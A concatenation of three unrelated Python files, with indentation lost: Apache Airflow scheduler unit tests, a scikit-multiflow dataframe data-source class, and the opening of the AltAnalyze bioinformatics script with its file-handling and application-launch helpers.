dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# now the executor has cleared and it should be allowed the re-queue
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
dataframe_data_source.py | from skmultiflow.data.source.data_source import DataSource
import threading
class DataframeDataSource(DataSource):
""" DataframeDataSource class.
Provides a DataSource implementation, reading from a dataframe.
Parameters
----------
dataframe: pd.DataFrame (Default=None)
The features' columns and targets' columns or the feature columns
only if they are passed separately.
"""
def __init__(self, record_to_dictionary, observers, dataframe):
super().__init__(record_to_dictionary, observers)
self.dataframe = dataframe
self.name = "DataframeDataSource" # TODO: can we md5 hash the content?
self._prepare_for_use()
def _prepare_for_use(self):
""" Prepares the data source to be used
"""
pass
def listen_for_events(self):
thread = threading.Thread(target=self.read_content, args=())
thread.daemon = True
thread.start()
def read_content(self):
for index, row in self.dataframe.iterrows():
self.on_new_event(row)
def get_info(self):
return "DataframeDataSource; observers: {}".format([x.get_name() for x in self.observers])
|
AltAnalyze.py | ###AltAnalyze
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import math
#import pkg_resources
#import distutils
from stats_scripts import statistics
import sys, string
import os.path
import unique
import update
import UI
import copy
import export; reload(export)
import ExpressionBuilder; reload(ExpressionBuilder)
from build_scripts import ExonAnalyze_module; reload(ExonAnalyze_module)
from import_scripts import ExonAnnotate_module; reload(ExonAnnotate_module)
from import_scripts import ResultsExport_module
from build_scripts import FeatureAlignment
import GO_Elite
import time
import webbrowser
import random
import traceback
import shutil
try:
import multiprocessing as mlp
except Exception:
mlp=None
print 'Note: Multiprocessing not supported for this verison python.'
try:
from scipy import stats
except Exception:
pass ### scipy is not required but is used as a faster implementation of Fisher Exact Test when present
try:
from PIL import Image as PIL_Image
try: import ImageTk
except Exception: from PIL import ImageTk
import PIL._imaging
import PIL._imagingft
except Exception:
print traceback.format_exc()
pass #print 'Python Imaging Library not installed... using default PNG viewer'
use_Tkinter = 'no'
debug_mode = 'no'
analysis_start_time = time.time()
command_args = string.join(sys.argv,' ')
if len(sys.argv[1:])>1 and '-' in command_args and '--GUI' not in command_args:
runningCommandLine = True
else:
runningCommandLine = False
def filepath(filename):
fn = unique.filepath(filename)
return fn
def read_directory(sub_dir):
dir_list = unique.read_directory(sub_dir)
dir_list2 = [] #add in code to prevent folder names from being included
for entry in dir_list:
if entry[-4:] == ".txt" or entry[-4:] == ".csv" or entry[-4:] == ".TXT":
dir_list2.append(entry)
return dir_list2
def eliminate_redundant_dict_values(database):
db1={}
for key in database:
list = unique.unique(database[key])
list.sort()
db1[key] = list
return db1
def makeUnique(item):
db1={}; list1=[]; k=0
for i in item:
try: db1[i]=[]
except TypeError: db1[tuple(i)]=[]; k=1
for i in db1:
if k==0: list1.append(i)
else: list1.append(list(i))
list1.sort()
return list1
def cleanUpLine(line):
line = string.replace(line,'\n','')
line = string.replace(line,'\c','')
data = string.replace(line,'\r','')
data = string.replace(data,'"','')
return data
def returnLargeGlobalVars():
### Prints all large global variables retained in memory (taking up space)
all = [var for var in globals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(globals()[var])>500:
print var, len(globals()[var])
except Exception: null=[]
def clearObjectsFromMemory(db_to_clear):
db_keys={}
try:
for key in db_to_clear: db_keys[key]=[]
except Exception:
for key in db_to_clear: del key ### if key is a list
for key in db_keys:
try: del db_to_clear[key]
except Exception:
try:
for i in key: del i ### For lists of tuples
except Exception: del key ### For plain lists
def importGeneric(filename):
fn=filepath(filename); key_db = {}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
key_db[t[0]] = t[1:]
return key_db
def importGenericFiltered(filename,filter_db):
fn=filepath(filename); key_db = {}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
key = t[0]
if key in filter_db: key_db[key] = t[1:]
return key_db
def importGenericFilteredDBList(filename,filter_db):
fn=filepath(filename); key_db = {}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
try:
null=filter_db[t[0]]
try: key_db[t[0]].append(t[1])
except KeyError: key_db[t[0]] = [t[1]]
except Exception: null=[]
return key_db
def importGenericDBList(filename):
fn=filepath(filename); key_db = {}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
try: key_db[t[0]].append(t[1])
except KeyError: key_db[t[0]] = [t[1]]
return key_db
def importExternalDBList(filename):
fn=filepath(filename); key_db = {}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
try: key_db[t[0]].append(t[1:])
except Exception: key_db[t[0]] = [t[1:]]
return key_db
def FindDir(dir,term):
dir_list = unique.read_directory(dir)
dir_list2=[]
dir_list.sort()
for i in dir_list:
if term == i: dir_list2.append(i)
if len(dir_list2)==0:
for i in dir_list:
if term in i: dir_list2.append(i)
dir_list2.sort(); dir_list2.reverse()
if len(dir_list2)>0: return dir_list2[0]
else: return ''
def openFile(file_dir):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+file_dir+'"')
except Exception: os.system('open "'+file_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+file_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+file_dir+'"')
def openCytoscape(parent_dir,application_dir,application_name):
cytoscape_dir = FindDir(parent_dir,application_dir); cytoscape_dir = filepath(parent_dir+'/'+cytoscape_dir)
app_dir = FindDir(cytoscape_dir,application_name)
app_dir = cytoscape_dir+'/'+app_dir
if 'linux' in sys.platform:
app_dir = app_dir
app_dir2 = cytoscape_dir+'/Cytoscape'
try: createCytoscapeDesktop(cytoscape_dir)
except Exception: null=[]
dir_list = unique.read_directory('/usr/bin/') ### Check to see that JAVA is installed
if 'java' not in dir_list: print 'Java not referenced in "usr/bin/. If not installed,\nplease install and re-try opening Cytoscape'
try:
jar_path = cytoscape_dir+'/cytoscape.jar'
main_path = cytoscape_dir+'/cytoscape.CyMain'
plugins_path = cytoscape_dir+'/plugins'
os.system('java -Dswing.aatext=true -Xss5M -Xmx512M -jar '+jar_path+' '+main_path+' -p '+plugins_path+' &')
print 'Cytoscape jar opened:',jar_path
except Exception:
print 'OS command to open Java failed.'
try:
try: openFile(app_dir2); print 'Cytoscape opened:',app_dir2
except Exception:
